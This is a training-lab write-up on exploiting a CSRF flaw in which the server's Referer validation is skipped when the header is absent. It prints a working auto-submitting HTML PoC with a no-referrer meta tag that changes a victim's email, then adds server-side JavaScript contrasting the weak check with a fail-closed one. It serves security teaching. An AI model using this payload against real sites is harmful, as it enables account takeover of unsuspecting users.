LAB 11 - CSRF where Referer validation depends on header being present
Initial instructions
This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer's email address.
You can log in to your own account using the following credentials: wiener:peter
First of all, let's log in with the wiener credentials, try to update the email, and intercept this request with Burp Suite.

Now I will generate a CSRF PoC from this intercepted request and send it to the victim.

Now I will go to the exploit server and send it to the victim. To make it work, we need to add a meta referrer tag.
We can add it at the top of the CSRF PoC, so the full payload would be:
<html>
<meta name="referrer" content="no-referrer">
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0a7a00630487b4608027b2fd00a300cb.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="hacked@hacked.xyz" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
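With this meta tag we suppress the Referer header: the browser sends the request without it, and because the validation depends on the header being present, the server falls back to accepting the request.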
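The weakness this lab exploits, seen from the server's side, as an added example (not the lab's code and not part of the original write-up): a Referer check that is skipped when the header is absent, next to a fail-closed version. The origin `https://shop.example`, the function names and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: hypothetical server-side checks, not the lab's actual code.
const ALLOWED_ORIGIN = "https://shop.example"; // constructed site origin

// Returns the origin of a header value, or null if it is missing or unparsable.
function originOf(value) {
  if (!value) return null;
  try {
    return new URL(value).origin;
  } catch {
    return null;
  }
}

// Weak form: the Referer is validated only when the browser sent one,
// so a request with no Referer header skips the check entirely.
function insecureRefererCheck(headers) {
  const referer = headers["referer"];
  if (referer === undefined) return true; // insecure fallback
  return originOf(referer) === ALLOWED_ORIGIN;
}

// Hardened form: fail closed. Use Origin when the browser sent it, otherwise
// Referer, and reject when neither yields exactly the expected origin.
function strictOriginCheck(headers) {
  const value =
    headers["origin"] !== undefined ? headers["origin"] : headers["referer"];
  return originOf(value) === ALLOWED_ORIGIN;
}

// Constructed sample requests (header names lower-cased, as Node delivers them).
const samples = {
  sameSite: { referer: "https://shop.example/my-account" },
  crossSite: { referer: "https://attacker.example/page" },
  noReferer: {}, // request arriving with the Referer header stripped
  lookalike: { referer: "https://shop.example.attacker.example/" },
};

// Runs both checks over every sample and returns the decisions by name.
function evaluate() {
  const out = {};
  for (const [name, headers] of Object.entries(samples)) {
    out[name] = { insecure: insecureRefererCheck(headers), strict: strictOriginCheck(headers) };
  }
  return out;
}

console.log(evaluate());
```

Header checks like this are defence in depth; an unpredictable CSRF token bound to the user's session remains the primary control for a state-changing request such as the email change.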
